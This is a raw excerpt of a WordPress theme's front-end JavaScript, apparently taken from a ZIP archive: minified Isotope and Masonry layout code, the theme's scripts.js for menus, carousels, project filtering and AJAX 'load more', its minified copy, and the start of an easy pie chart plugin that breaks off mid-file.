t=this.element.getBoundingClientRect(),e=this.size;this._boundingRect={left:t.left+e.paddingLeft+e.borderLeftWidth,top:t.top+e.paddingTop+e.borderTopWidth,right:t.right-(e.paddingRight+e.borderRightWidth),bottom:t.bottom-(e.paddingBottom+e.borderBottomWidth)}},c._manageStamp=d,c._getElementOffset=function(t){var e=t.getBoundingClientRect(),o=this._boundingRect,n=i(t),s={left:e.left-o.left-n.marginLeft,top:e.top-o.top-n.marginTop,right:o.right-e.right-n.marginRight,bottom:o.bottom-e.bottom-n.marginBottom};return s},c.handleEvent=o.handleEvent,c.bindResize=function(){t.addEventListener("resize",this),this.isResizeBound=!0},c.unbindResize=function(){t.removeEventListener("resize",this),this.isResizeBound=!1},c.onresize=function(){this.resize()},o.debounceMethod(s,"onresize",100),c.resize=function(){this.isResizeBound&&this.needsResizeLayout()&&this.layout()},c.needsResizeLayout=function(){var t=i(this.element),e=this.size&&t;return e&&t.innerWidth!==this.size.innerWidth},c.addItems=function(t){var e=this._itemize(t);return e.length&&(this.items=this.items.concat(e)),e},c.appended=function(t){var e=this.addItems(t);e.length&&(this.layoutItems(e,!0),this.reveal(e))},c.prepended=function(t){var e=this._itemize(t);if(e.length){var i=this.items.slice(0);this.items=e.concat(i),this._resetLayout(),this._manageStamps(),this.layoutItems(e,!0),this.reveal(e),this.layoutItems(i)}},c.reveal=function(t){if(this._emitCompleteOnItems("reveal",t),t&&t.length){var e=this.updateStagger();t.forEach(function(t,i){t.stagger(i*e),t.reveal()})}},c.hide=function(t){if(this._emitCompleteOnItems("hide",t),t&&t.length){var e=this.updateStagger();t.forEach(function(t,i){t.stagger(i*e),t.hide()})}},c.revealItemElements=function(t){var e=this.getItems(t);this.reveal(e)},c.hideItemElements=function(t){var e=this.getItems(t);this.hide(e)},c.getItem=function(t){for(var e=0;e<this.items.length;e++){var i=this.items[e];if(i.element==t)return i}},c.getItems=function(t){t=o.makeArray(t);var e=[];return t.forEach(function(t){var i=this.getItem(t);i&&e.push(i)},this),e},c.remove=function(t){var e=this.getItems(t);this._emitCompleteOnItems("remove",e),e&&e.length&&e.forEach(function(t){t.remove(),o.removeFrom(this.items,t)},this)},c.destroy=function(){var t=this.element.style;t.height="",t.position="",t.width="",this.items.forEach(function(t){t.destroy()}),this.unbindResize();var e=this.element.outlayerGUID;delete f[e],delete this.element.outlayerGUID,h&&h.removeData(this.element,this.constructor.namespace)},s.data=function(t){t=o.getQueryElement(t);var e=t&&t.outlayerGUID;return e&&f[e]},s.create=function(t,e){var i=r(s);return i.defaults=o.extend({},s.defaults),o.extend(i.defaults,e),i.compatOptions=o.extend({},s.compatOptions),i.namespace=t,i.data=s.data,i.Item=r(n),o.htmlInit(i,t),h&&h.bridget&&h.bridget(t,i),i};var m={ms:1,s:1e3};return s.Item=n,s}),function(t,e){"function"==typeof define&&define.amd?define("isotope-layout/js/item",["outlayer/outlayer"],e):"object"==typeof module&&module.exports?module.exports=e(require("outlayer")):(t.Isotope=t.Isotope||{},t.Isotope.Item=e(t.Outlayer))}(window,function(t){"use strict";function e(){t.Item.apply(this,arguments)}var i=e.prototype=Object.create(t.Item.prototype),o=i._create;i._create=function(){this.id=this.layout.itemGUID++,o.call(this),this.sortData={}},i.updateSortData=function(){if(!this.isIgnored){this.sortData.id=this.id,this.sortData["original-order"]=this.id,this.sortData.random=Math.random();var t=this.layout.options.getSortData,e=this.layout._sorters;for(var i in t){var o=e[i];this.sortData[i]=o(this.element,this)}}};var n=i.destroy;return i.destroy=function(){n.apply(this,arguments),this.css({display:""})},e}),function(t,e){"function"==typeof define&&define.amd?define("isotope-layout/js/layout-mode",["get-size/get-size","outlayer/outlayer"],e):"object"==typeof module&&module.exports?module.exports=e(require("get-size"),require("outlayer")):(t.Isotope=t.Isotope||{},t.Isotope.LayoutMode=e(t.getSize,t.Outlayer))}(window,function(t,e){"use strict";function i(t){this.isotope=t,t&&(this.options=t.options[this.namespace],this.element=t.element,this.items=t.filteredItems,this.size=t.size)}var o=i.prototype,n=["_resetLayout","_getItemLayoutPosition","_manageStamp","_getContainerSize","_getElementOffset","needsResizeLayout","_getOption"];return n.forEach(function(t){o[t]=function(){return e.prototype[t].apply(this.isotope,arguments)}}),o.needsVerticalResizeLayout=function(){var e=t(this.isotope.element),i=this.isotope.size&&e;return i&&e.innerHeight!=this.isotope.size.innerHeight},o._getMeasurement=function(){this.isotope._getMeasurement.apply(this,arguments)},o.getColumnWidth=function(){this.getSegmentSize("column","Width")},o.getRowHeight=function(){this.getSegmentSize("row","Height")},o.getSegmentSize=function(t,e){var i=t+e,o="outer"+e;if(this._getMeasurement(i,o),!this[i]){var n=this.getFirstItemSize();this[i]=n&&n[o]||this.isotope.size["inner"+e]}},o.getFirstItemSize=function(){var e=this.isotope.filteredItems[0];return e&&e.element&&t(e.element)},o.layout=function(){this.isotope.layout.apply(this.isotope,arguments)},o.getSize=function(){this.isotope.getSize(),this.size=this.isotope.size},i.modes={},i.create=function(t,e){function n(){i.apply(this,arguments)}return n.prototype=Object.create(o),n.prototype.constructor=n,e&&(n.options=e),n.prototype.namespace=t,i.modes[t]=n,n},i}),function(t,e){"function"==typeof define&&define.amd?define("masonry-layout/masonry",["outlayer/outlayer","get-size/get-size"],e):"object"==typeof module&&module.exports?module.exports=e(require("outlayer"),require("get-size")):t.Masonry=e(t.Outlayer,t.getSize)}(window,function(t,e){var i=t.create("masonry");i.compatOptions.fitWidth="isFitWidth";var o=i.prototype;return o._resetLayout=function(){this.getSize(),this._getMeasurement("columnWidth","outerWidth"),this._getMeasurement("gutter","outerWidth"),this.measureColumns(),this.colYs=[];for(var t=0;t<this.cols;t++)this.colYs.push(0);this.maxY=0,this.horizontalColIndex=0},o.measureColumns=function(){if(this.getContainerWidth(),!this.columnWidth){var t=this.items[0],i=t&&t.element;this.columnWidth=i&&e(i).outerWidth||this.containerWidth}var o=this.columnWidth+=this.gutter,n=this.containerWidth+this.gutter,s=n/o,r=o-n%o,a=r&&r<1?"round":"floor";s=Math[a](s),this.cols=Math.max(s,1)},o.getContainerWidth=function(){var t=this._getOption("fitWidth"),i=t?this.element.parentNode:this.element,o=e(i);this.containerWidth=o&&o.innerWidth},o._getItemLayoutPosition=function(t){t.getSize();var e=t.size.outerWidth%this.columnWidth,i=e&&e<1?"round":"ceil",o=Math[i](t.size.outerWidth/this.columnWidth);o=Math.min(o,this.cols);for(var n=this.options.horizontalOrder?"_getHorizontalColPosition":"_getTopColPosition",s=this[n](o,t),r={x:this.columnWidth*s.col,y:s.y},a=s.y+t.size.outerHeight,u=o+s.col,h=s.col;h<u;h++)this.colYs[h]=a;return r},o._getTopColPosition=function(t){var e=this._getTopColGroup(t),i=Math.min.apply(Math,e);return{col:e.indexOf(i),y:i}},o._getTopColGroup=function(t){if(t<2)return this.colYs;for(var e=[],i=this.cols+1-t,o=0;o<i;o++)e[o]=this._getColGroupY(o,t);return e},o._getColGroupY=function(t,e){if(e<2)return this.colYs[t];var i=this.colYs.slice(t,t+e);return Math.max.apply(Math,i)},o._getHorizontalColPosition=function(t,e){var i=this.horizontalColIndex%this.cols,o=t>1&&i+t>this.cols;i=o?0:i;var n=e.size.outerWidth&&e.size.outerHeight;return this.horizontalColIndex=n?i+t:this.horizontalColIndex,{col:i,y:this._getColGroupY(i,t)}},o._manageStamp=function(t){var i=e(t),o=this._getElementOffset(t),n=this._getOption("originLeft"),s=n?o.left:o.right,r=s+i.outerWidth,a=Math.floor(s/this.columnWidth);a=Math.max(0,a);var u=Math.floor(r/this.columnWidth);u-=r%this.columnWidth?0:1,u=Math.min(this.cols-1,u);for(var h=this._getOption("originTop"),d=(h?o.top:o.bottom)+i.outerHeight,l=a;l<=u;l++)this.colYs[l]=Math.max(d,this.colYs[l])},o._getContainerSize=function(){this.maxY=Math.max.apply(Math,this.colYs);var t={height:this.maxY};return this._getOption("fitWidth")&&(t.width=this._getContainerFitWidth()),t},o._getContainerFitWidth=function(){for(var t=0,e=this.cols;--e&&0===this.colYs[e];)t++;return(this.cols-t)*this.columnWidth-this.gutter},o.needsResizeLayout=function(){var t=this.containerWidth;return this.getContainerWidth(),t!=this.containerWidth},i}),function(t,e){"function"==typeof define&&define.amd?define("isotope-layout/js/layout-modes/masonry",["../layout-mode","masonry-layout/masonry"],e):"object"==typeof module&&module.exports?module.exports=e(require("../layout-mode"),require("masonry-layout")):e(t.Isotope.LayoutMode,t.Masonry)}(window,function(t,e){"use strict";var i=t.create("masonry"),o=i.prototype,n={_getElementOffset:!0,layout:!0,_getMeasurement:!0};for(var s in e.prototype)n[s]||(o[s]=e.prototype[s]);var r=o.measureColumns;o.measureColumns=function(){this.items=this.isotope.filteredItems,r.call(this)};var a=o._getOption;return o._getOption=function(t){return"fitWidth"==t?void 0!==this.options.isFitWidth?this.options.isFitWidth:this.options.fitWidth:a.apply(this.isotope,arguments)},i}),function(t,e){"function"==typeof define&&define.amd?define("isotope-layout/js/layout-modes/fit-rows",["../layout-mode"],e):"object"==typeof exports?module.exports=e(require("../layout-mode")):e(t.Isotope.LayoutMode)}(window,function(t){"use strict";var e=t.create("fitRows"),i=e.prototype;return i._resetLayout=function(){this.x=0,this.y=0,this.maxY=0,this._getMeasurement("gutter","outerWidth")},i._getItemLayoutPosition=function(t){t.getSize();var e=t.size.outerWidth+this.gutter,i=this.isotope.size.innerWidth+this.gutter;0!==this.x&&e+this.x>i&&(this.x=0,this.y=this.maxY);var o={x:this.x,y:this.y};return this.maxY=Math.max(this.maxY,this.y+t.size.outerHeight),this.x+=e,o},i._getContainerSize=function(){return{height:this.maxY}},e}),function(t,e){"function"==typeof define&&define.amd?define("isotope-layout/js/layout-modes/vertical",["../layout-mode"],e):"object"==typeof module&&module.exports?module.exports=e(require("../layout-mode")):e(t.Isotope.LayoutMode)}(window,function(t){"use strict";var e=t.create("vertical",{horizontalAlignment:0}),i=e.prototype;return i._resetLayout=function(){this.y=0},i._getItemLayoutPosition=function(t){t.getSize();var e=(this.isotope.size.innerWidth-t.size.outerWidth)*this.options.horizontalAlignment,i=this.y;return this.y+=t.size.outerHeight,{x:e,y:i}},i._getContainerSize=function(){return{height:this.y}},e}),function(t,e){"function"==typeof define&&define.amd?define(["outlayer/outlayer","get-size/get-size","desandro-matches-selector/matches-selector","fizzy-ui-utils/utils","isotope-layout/js/item","isotope-layout/js/layout-mode","isotope-layout/js/layout-modes/masonry","isotope-layout/js/layout-modes/fit-rows","isotope-layout/js/layout-modes/vertical"],function(i,o,n,s,r,a){return e(t,i,o,n,s,r,a)}):"object"==typeof module&&module.exports?module.exports=e(t,require("outlayer"),require("get-size"),require("desandro-matches-selector"),require("fizzy-ui-utils"),require("isotope-layout/js/item"),require("isotope-layout/js/layout-mode"),require("isotope-layout/js/layout-modes/masonry"),require("isotope-layout/js/layout-modes/fit-rows"),require("isotope-layout/js/layout-modes/vertical")):t.Isotope=e(t,t.Outlayer,t.getSize,t.matchesSelector,t.fizzyUIUtils,t.Isotope.Item,t.Isotope.LayoutMode)}(window,function(t,e,i,o,n,s,r){function a(t,e){return function(i,o){for(var n=0;n<t.length;n++){var s=t[n],r=i.sortData[s],a=o.sortData[s];if(r>a||r<a){var u=void 0!==e[s]?e[s]:e,h=u?1:-1;return(r>a?1:-1)*h}}return 0}}var u=t.jQuery,h=String.prototype.trim?function(t){return t.trim()}:function(t){return t.replace(/^\s+|\s+$/g,"")},d=e.create("isotope",{layoutMode:"masonry",isJQueryFiltering:!0,sortAscending:!0});d.Item=s,d.LayoutMode=r;var l=d.prototype;l._create=function(){this.itemGUID=0,this._sorters={},this._getSorters(),e.prototype._create.call(this),this.modes={},this.filteredItems=this.items,this.sortHistory=["original-order"];for(var t in r.modes)this._initLayoutMode(t)},l.reloadItems=function(){this.itemGUID=0,e.prototype.reloadItems.call(this)},l._itemize=function(){for(var t=e.prototype._itemize.apply(this,arguments),i=0;i<t.length;i++){var o=t[i];o.id=this.itemGUID++}return this._updateItemsSortData(t),t},l._initLayoutMode=function(t){var e=r.modes[t],i=this.options[t]||{};this.options[t]=e.options?n.extend(e.options,i):i,this.modes[t]=new e(this)},l.layout=function(){return!this._isLayoutInited&&this._getOption("initLayout")?void this.arrange():void this._layout()},l._layout=function(){var t=this._getIsInstant();this._resetLayout(),this._manageStamps(),this.layoutItems(this.filteredItems,t),this._isLayoutInited=!0},l.arrange=function(t){this.option(t),this._getIsInstant();var e=this._filter(this.items);this.filteredItems=e.matches,this._bindArrangeComplete(),this._isInstant?this._noTransition(this._hideReveal,[e]):this._hideReveal(e),this._sort(),this._layout()},l._init=l.arrange,l._hideReveal=function(t){this.reveal(t.needReveal),this.hide(t.needHide)},l._getIsInstant=function(){var t=this._getOption("layoutInstant"),e=void 0!==t?t:!this._isLayoutInited;return this._isInstant=e,e},l._bindArrangeComplete=function(){function t(){e&&i&&o&&n.dispatchEvent("arrangeComplete",null,[n.filteredItems])}var e,i,o,n=this;this.once("layoutComplete",function(){e=!0,t()}),this.once("hideComplete",function(){i=!0,t()}),this.once("revealComplete",function(){o=!0,t()})},l._filter=function(t){var e=this.options.filter;e=e||"*";for(var i=[],o=[],n=[],s=this._getFilterTest(e),r=0;r<t.length;r++){var a=t[r];if(!a.isIgnored){var u=s(a);u&&i.push(a),u&&a.isHidden?o.push(a):u||a.isHidden||n.push(a)}}return{matches:i,needReveal:o,needHide:n}},l._getFilterTest=function(t){return u&&this.options.isJQueryFiltering?function(e){return u(e.element).is(t);
}:"function"==typeof t?function(e){return t(e.element)}:function(e){return o(e.element,t)}},l.updateSortData=function(t){var e;t?(t=n.makeArray(t),e=this.getItems(t)):e=this.items,this._getSorters(),this._updateItemsSortData(e)},l._getSorters=function(){var t=this.options.getSortData;for(var e in t){var i=t[e];this._sorters[e]=f(i)}},l._updateItemsSortData=function(t){for(var e=t&&t.length,i=0;e&&i<e;i++){var o=t[i];o.updateSortData()}};var f=function(){function t(t){if("string"!=typeof t)return t;var i=h(t).split(" "),o=i[0],n=o.match(/^\[(.+)\]$/),s=n&&n[1],r=e(s,o),a=d.sortDataParsers[i[1]];return t=a?function(t){return t&&a(r(t))}:function(t){return t&&r(t)}}function e(t,e){return t?function(e){return e.getAttribute(t)}:function(t){var i=t.querySelector(e);return i&&i.textContent}}return t}();d.sortDataParsers={parseInt:function(t){return parseInt(t,10)},parseFloat:function(t){return parseFloat(t)}},l._sort=function(){if(this.options.sortBy){var t=n.makeArray(this.options.sortBy);this._getIsSameSortBy(t)||(this.sortHistory=t.concat(this.sortHistory));var e=a(this.sortHistory,this.options.sortAscending);this.filteredItems.sort(e)}},l._getIsSameSortBy=function(t){for(var e=0;e<t.length;e++)if(t[e]!=this.sortHistory[e])return!1;return!0},l._mode=function(){var t=this.options.layoutMode,e=this.modes[t];if(!e)throw new Error("No layout mode: "+t);return e.options=this.options[t],e},l._resetLayout=function(){e.prototype._resetLayout.call(this),this._mode()._resetLayout()},l._getItemLayoutPosition=function(t){return this._mode()._getItemLayoutPosition(t)},l._manageStamp=function(t){this._mode()._manageStamp(t)},l._getContainerSize=function(){return this._mode()._getContainerSize()},l.needsResizeLayout=function(){return this._mode().needsResizeLayout()},l.appended=function(t){var e=this.addItems(t);if(e.length){var i=this._filterRevealAdded(e);this.filteredItems=this.filteredItems.concat(i)}},l.prepended=function(t){var e=this._itemize(t);if(e.length){this._resetLayout(),this._manageStamps();var i=this._filterRevealAdded(e);this.layoutItems(this.filteredItems),this.filteredItems=i.concat(this.filteredItems),this.items=e.concat(this.items)}},l._filterRevealAdded=function(t){var e=this._filter(t);return this.hide(e.needHide),this.reveal(e.matches),this.layoutItems(e.matches,!0),e.matches},l.insert=function(t){var e=this.addItems(t);if(e.length){var i,o,n=e.length;for(i=0;i<n;i++)o=e[i],this.element.appendChild(o.element);var s=this._filter(e).matches;for(i=0;i<n;i++)e[i].isLayoutInstant=!0;for(this.arrange(),i=0;i<n;i++)delete e[i].isLayoutInstant;this.reveal(s)}};var c=l.remove;return l.remove=function(t){t=n.makeArray(t);var e=this.getItems(t);c.call(this,t);for(var i=e&&e.length,o=0;i&&o<i;o++){var s=e[o];n.removeFrom(this.filteredItems,s)}},l.shuffle=function(){for(var t=0;t<this.items.length;t++){var e=this.items[t];e.sortData.random=Math.random()}this.options.sortBy="random",this._sort(),this._layout()},l._noTransition=function(t,e){var i=this.options.transitionDuration;this.options.transitionDuration=0;var o=t.apply(this,e);return this.options.transitionDuration=i,o},l.getFilteredItemElements=function(){return this.filteredItems.map(function(t){return t.element})},d});PK�8FZ�qn#n#
js/scripts.jsnu�[���( function( $ ) {
	'use strict';
	
	/* rtl check */
	function rtl_owl(){
	if ($('body').hasClass("rtl")) {
		return true;
	} else {
		return false;
	}};

	/* --------------------------------------------------
    * preloader
    * --------------------------------------------------*/
	if ( $('#royal_preloader').length ) {
		var $selector       = $('#royal_preloader'),
			$width          = $selector.data('width'),
			$height         = $selector.data('height'),
			$color          = $selector.data('color'),
			$bgcolor        = $selector.data('bgcolor'),
			$logourl        = $selector.data('url');
		
		Royal_Preloader.config({
			mode           : 'logo',
			logo           : $logourl,
			logo_size      : [$width, $height],
			showProgress   : true,
			showPercentage : true,
			text_colour: $color,
			background:  $bgcolor,
		});        
	};

    /* --------------------------------------------------
    * sticky header
    * --------------------------------------------------*/
	$('.header-static .is-fixed').parent().append('<div class="header-clone"></div>');
	$('.header-clone').height($('#site-header .is-fixed').outerHeight());
	$('.header-static .header-clone').hide();	
	$(window).on("scroll", function(){
		var site_header = $('#site-header').outerHeight() + 1;	
			
		if ($(window).scrollTop() >= site_header) {	    	
			$('.site-header .is-fixed').addClass('is-stuck');	
			$('.header-static .header-clone').show();	
		}else {
			$('.site-header .is-fixed').removeClass('is-stuck');		              
			$('.header-static .header-clone').hide();
		}
	});

    /* --------------------------------------------------
    * mobile menu
    * --------------------------------------------------*/
    $('.mmenu_wrapper li:has(ul)').prepend('<span class="arrow"><i class="ot-flaticon-signs-1"></i></span>');
    $(".mmenu_wrapper .mobile_mainmenu > li span.arrow").on('click',function() {
        $(this).parent().find("> ul").stop(true, true).slideToggle()
        $(this).toggleClass( "active" ); 
    });
	
	$( "#mmenu_toggle" ).on('click', function() {
		$(this).toggleClass( "active" );
		$(this).parents('.header_mobile').toggleClass( "open" );
		if ($(this).hasClass( "active" )) {
			$('.mobile_nav').stop(true, true).slideDown(100);
		}else{
			$('.mobile_nav').stop(true, true).slideUp(100);
		}		
	});

	/* --------------------------------------------------
    * gallery post
    * --------------------------------------------------*/
	$('.gallery-post').each( function () {
		var selector = $(this);
		selector.owlCarousel({
			rtl: rtl_owl(),
			autoplay:true,
			autoplayTimeout: 6000,
			loop:true,
			margin:0,
			responsiveClass:true,
			items:1,
			dots:true,
			nav:false,
			navText:['<i class="ot-flaticon-left-arrow-2"></i>', '<i class="ot-flaticon-arrowsoutline"></i>']
		});
	});

	/* --------------------------------------------------
    * popup video
    * --------------------------------------------------*/
  	var video_popup = $('.video-popup');
   	if (video_popup.length > 0 ) {
	   	video_popup.each( function(){
		   	$(this).lightGallery({
			   selector: '.btn-play',
		   	});
	   	});
	};

	/* --------------------------------------------------
    * filter projects
    * --------------------------------------------------*/
	function updateFilter() {
		$('.project_filters a').each(function() {
			var data_filter = this.getAttribute('data-filter');
			var num = $(this)
				.closest('.project-filter-wrapper')
				.find('.project-item')
				.filter(data_filter).length;
			$(this)
				.find('.filter-count')
				.text( num );
			if ( num != 0 && $(this).hasClass('empty') ) {
				$(this).removeClass('empty');
			}
		});
	}
	$('.project-filter-wrapper').each( function(){
		var $container = $(this).find('.projects-grid'); 
		$container.isotope({ 
			itemSelector : '.project-item', 
			animationEngine : 'css',
			masonry: {
				columnWidth: '.grid-sizer'
			},
		});

		var $optionSets  = $(this).find('.project_filters'),
			$optionLinks = $optionSets.find('a');

		$optionLinks.on('click', function(){
			var $this = $(this);

			if ( $this.hasClass('selected') ) {
				return false;
			}
			var $optionSet = $this.parents('.project_filters');
				$optionSet.find('.selected').removeClass('selected');
				$this.addClass('selected');

			var selector = $(this).attr('data-filter');
				$container.isotope({ 
					filter: selector 
				});
			return false;
		});
		/* count filters */
		updateFilter();
	});

	/* load more button */    
	$('#btn-loadmore').on('click',function(){
		var btn		= $(this),
			grid    = $(this).parents('.project-filter-wrapper').find('.projects-grid'),
			offset  = grid.find('.project-item').length,
			more    = grid.data('load'),
			loaded  = $(this).data('loaded'),
			loading = $(this).data('loading'),
			cat 	= $(this).data('category'),
			count   = grid.data('count');
		$.ajax({
			url : maxbizz_loadmore_params.ajaxurl, // AJAX handler
			data : {
				'action': 'loadmore', // the parameter for admin-ajax.php
				'ppp'	: more,
				'cat'	: cat,
				'offset': offset,
			},
			type : 'POST',
			beforeSend : function ( xhr ) {
				btn.text(loading).append('<i class="ot-flaticon-refresh fas fa-spin"></i>'); // some type of preloader
			},
			success : function( data ){
				if( data ) {
					var items = $(data);
					btn.text(loaded);
					grid.append(items).isotope('appended', items); // insert new posts
					updateFilter();
				} else {
					btn.hide(); // if no data, HIDE the button as well
				}
			}
		});
		offset += more;
		if( count <= offset ){
			btn.fadeOut(1000);
		}
		return false;
	});

	/* --------------------------------------------------
    * related projects
    * --------------------------------------------------*/
	$('.portfolio-related-posts').each( function () {
		var selector = $(this).find('.owl-carousel');
		selector.owlCarousel({
			rtl: rtl_owl(),
			autoplay:false,
			responsiveClass:true,
			dots:true,
			nav:false,
			navText:['<i class="ot-flaticon-left-arrow-2"></i>', '<i class="ot-flaticon-arrowsoutline"></i>'],
			responsive : {
				0 : {
					margin:0,
					items:1,
				},
				600 : {
					margin:15,
					items:2,
				},
				768 : {
					margin:30,
					items:2,
				},
				1024 : {
					margin:30,
					items:3,
				}
			}
		});
	});

	/* --------------------------------------------------
	* switcher
	* --------------------------------------------------*/
	var swt = $('.ot-switcher').find('.switch input');
	$('section.yearly').hide();
	swt.on( 'change', function() {
		var parent = $(this).parents('.elementor-top-section');
		if(this.checked) {
			parent.find('.r-switch').addClass('active');
			parent.find('.l-switch').removeClass('active');
			parent.find('section.monthly').hide();
			parent.find('section.yearly').show();
		}else{
			parent.find('.l-switch').addClass('active');
			parent.find('.r-switch').removeClass('active');
			parent.find('section.yearly').hide();
			parent.find('section.monthly').show();
		}
	});

	/* --------------------------------------------------
    * big tabs
    * --------------------------------------------------*/
	$('.tab-titles .title-item a').on( 'click', function(){
		$('.tab-active').removeClass('tab-active');
		$(this).addClass('tab-active');
		$('.content-tab').hide();
		$($(this).attr('href')).show();

		return false;
	});
	$('.tab-titles .title-item:first a').trigger('click');

    /* --------------------------------------------------
    * back to top
    * --------------------------------------------------*/
    if ($('#back-to-top').length) {
	    var scrollTrigger = 500, // px
	        backToTop = function () {
	            var scrollTop = $(window).scrollTop();
	            if (scrollTop > scrollTrigger) {
	                $('#back-to-top').addClass('show');
	            } else {
	                $('#back-to-top').removeClass('show');
	            }
	        };
	    backToTop();
	    $(window).on('scroll', function () {
	        backToTop();
	    });
	    $('#back-to-top').on('click', function (e) {
	        e.preventDefault();
	        $('html,body').animate({
	            scrollTop: 0
	        }, 700);
	    });	
	}

	/*
	* Footer fixed
	*/
	var bumpIt = function () {
        if ($(window).width() > 1024) {
            $(".footer-fixed .site-content").css("margin-bottom", parseInt($(".footer-fixed .site-footer").height()));
        } else {
            $(".footer-fixed .site-content").css("margin-bottom", 0);
        }
    },
    didResize = false;
    setInterval(function () {
        bumpIt();
    }, 250);
    $(window).resize(function () {
        didResize = true;
    });
    setInterval(function () {
        if (didResize) {
            didResize = false;
            bumpIt();
        }
    }, 250);

} )( jQuery );
PK�8FZot@lljs/scripts.min.jsnu�[���!function(l){"use strict";function t(){return!!l("body").hasClass("rtl")}var e,i,a,o,s,n;l("#royal_preloader").length&&(i=(e=l("#royal_preloader")).data("width"),a=e.data("height"),o=e.data("color"),s=e.data("bgcolor"),n=e.data("url"),Royal_Preloader.config({mode:"logo",logo:n,logo_size:[i,a],showProgress:!0,showPercentage:!0,text_colour:o,background:s})),l(".header-static .is-fixed").parent().append('<div class="header-clone"></div>'),l(".header-clone").height(l("#site-header .is-fixed").outerHeight()),l(".header-static .header-clone").hide(),l(window).on("scroll",function(){var t=l("#site-header").outerHeight()+1;l(window).scrollTop()>=t?(l(".site-header .is-fixed").addClass("is-stuck"),l(".header-static .header-clone").show()):(l(".site-header .is-fixed").removeClass("is-stuck"),l(".header-static .header-clone").hide())}),l(".mmenu_wrapper li:has(ul)").prepend('<span class="arrow"><i class="ot-flaticon-signs-1"></i></span>'),l(".mmenu_wrapper .mobile_mainmenu > li span.arrow").on("click",function(){l(this).parent().find("> ul").stop(!0,!0).slideToggle(),l(this).toggleClass("active")}),l("#mmenu_toggle").on("click",function(){l(this).toggleClass("active"),l(this).parents(".header_mobile").toggleClass("open"),l(this).hasClass("active")?l(".mobile_nav").stop(!0,!0).slideDown(100):l(".mobile_nav").stop(!0,!0).slideUp(100)}),l(".gallery-post").each(function(){l(this).owlCarousel({rtl:t(),autoplay:!0,autoplayTimeout:6e3,loop:!0,margin:0,responsiveClass:!0,items:1,dots:!0,nav:!1,navText:['<i class="ot-flaticon-left-arrow-2"></i>','<i class="ot-flaticon-arrowsoutline"></i>']})});var r=l(".video-popup");function c(){l(".project_filters a").each(function(){var t=this.getAttribute("data-filter"),e=l(this).closest(".project-filter-wrapper").find(".project-item").filter(t).length;l(this).find(".filter-count").text(e),0!=e&&l(this).hasClass("empty")&&l(this).removeClass("empty")})}0<r.length&&r.each(function(){l(this).lightGallery({selector:".btn-play"})}),l(".project-filter-wrapper").each(function(){var i=l(this).find(".projects-grid");i.isotope({itemSelector:".project-item",animationEngine:"css",masonry:{columnWidth:".grid-sizer"}}),l(this).find(".project_filters").find("a").on("click",function(){var t=l(this);if(t.hasClass("selected"))return!1;t.parents(".project_filters").find(".selected").removeClass("selected"),t.addClass("selected");var e=l(this).attr("data-filter");return i.isotope({filter:e}),!1}),c()}),l("#btn-loadmore").on("click",function(){var i=l(this),a=l(this).parents(".project-filter-wrapper").find(".projects-grid"),t=a.find(".project-item").length,e=a.data("load"),o=l(this).data("loaded"),s=l(this).data("loading"),n=l(this).data("category"),r=a.data("count");return l.ajax({url:maxbizz_loadmore_params.ajaxurl,data:{action:"loadmore",ppp:e,cat:n,offset:t},type:"POST",beforeSend:function(t){i.text(s).append('<i class="ot-flaticon-refresh fas fa-spin"></i>')},success:function(t){var e;t?(e=l(t),i.text(o),a.append(e).isotope("appended",e),c()):i.hide()}}),r<=(t+=e)&&i.fadeOut(1e3),!1}),l(".portfolio-related-posts").each(function(){l(this).find(".owl-carousel").owlCarousel({rtl:t(),autoplay:!1,responsiveClass:!0,dots:!0,nav:!1,navText:['<i class="ot-flaticon-left-arrow-2"></i>','<i class="ot-flaticon-arrowsoutline"></i>'],responsive:{0:{margin:0,items:1},600:{margin:15,items:2},768:{margin:30,items:2},1024:{margin:30,items:3}}})});var d,h=l(".ot-switcher").find(".switch input");l("section.yearly").hide(),h.on("change",function(){var t=l(this).parents(".elementor-top-section");this.checked?(t.find(".r-switch").addClass("active"),t.find(".l-switch").removeClass("active"),t.find("section.monthly").hide(),t.find("section.yearly").show()):(t.find(".l-switch").addClass("active"),t.find(".r-switch").removeClass("active"),t.find("section.yearly").hide(),t.find("section.monthly").show())}),l(".tab-titles .title-item a").on("click",function(){return l(".tab-active").removeClass("tab-active"),l(this).addClass("tab-active"),l(".content-tab").hide(),l(l(this).attr("href")).show(),!1}),l(".tab-titles .title-item:first a").trigger("click"),l("#back-to-top").length&&((d=function(){500<l(window).scrollTop()?l("#back-to-top").addClass("show"):l("#back-to-top").removeClass("show")})(),l(window).on("scroll",function(){d()}),l("#back-to-top").on("click",function(t){t.preventDefault(),l("html,body").animate({scrollTop:0},700)}));function f(){1024<l(window).width()?l(".footer-fixed .site-content").css("margin-bottom",parseInt(l(".footer-fixed .site-footer").height())):l(".footer-fixed .site-content").css("margin-bottom",0)}var p=!1;setInterval(function(){f()},250),l(window).resize(function(){p=!0}),setInterval(function(){p&&(p=!1,f())},250)}(jQuery);PK�8FZfѢ�kkjs/easypiechart.min.jsnu�[���!function(t){"function"==typeof define&&define.amd?define(["jquery"],function(e){return t(e)}):"object"==typeof exports?module.exports=t(require("jquery")):t(jQuery)}(function(n){function o(e,o){var n,t=document.createElement("canvas");e.appendChild(t),"object"==typeof G_vmlCanvasManager&&G_vmlCanvasManager.initElement(t);var i=t.getContext("2d");t.width=t.height=o.size;var a=1;1<window.devicePixelRatio&&(a=window.devicePixelRatio,t.style.width=t.style.height=[o.size,"px"].join(""),t.width=t.height=o.size*a,i.scale(a,a)),i.translate(o.size/2,o.size/2),i.rotate((o.rotate/180-.5)*Math.PI);var r=(o.size-o.lineWidth)/2;function s(e,t,n){var a=(n=Math.min(Math.max(-1,n||0),1))<=0;i.beginPath(),i.arc(0,0,r,0,2*Math.PI*n,a),i.strokeStyle=e,i.lineWidth=t,i.stroke()}function d(){o.scaleColor&&function(){var e,t;i.lineWidth=1,i.fillStyle=o.scaleColor,i.save();for(var n=24;0<n;--n)e=n%6==0?(t=o.scaleLength,0):(t=.6*o.scaleLength,o.scaleLength-t),i.fillRect(-o.size/2+e,0,t,1),i.rotate(Math.PI/12);i.restore()}(),o.trackColor&&s(o.trackColor,o.trackWidth||o.lineWidth,1)}o.scaleColor&&o.scaleLength&&(r-=o.scaleLength+2),Date.now=Date.now||function(){return+new Date};var h=window.requestAnimationFrame||window.webkitRequestAnimationFrame||window.mozRequestAnimationFrame||function(e){window.setTimeout(e,1e3/60)};this.getCanvas=function(){return t},this.getCtx=function(){return i},this.clear=function(){i.clearRect(o.size/-2,o.size/-2,o.size,o.size)},this.draw=function(e){var 